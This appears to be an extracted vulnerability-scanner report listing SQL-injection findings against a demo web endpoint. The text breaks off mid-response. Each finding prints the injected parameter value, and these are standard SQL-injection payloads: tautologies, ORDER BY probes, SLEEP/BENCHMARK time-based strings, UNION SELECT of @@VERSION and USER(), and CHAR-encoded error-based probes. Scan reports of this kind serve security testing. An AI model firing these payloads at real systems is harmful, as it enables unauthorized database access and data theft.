href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #397\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioOR 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #398\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or '1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #399\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #400\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #401\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #402Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #403\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #404\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')\n),4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #405\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #406\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or (\"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #407\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #408\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #409\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io&&SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #410\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 2947=LIKE('ABCDEFG',UPPER(HEX(\nRANDOMBLOB(1000000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 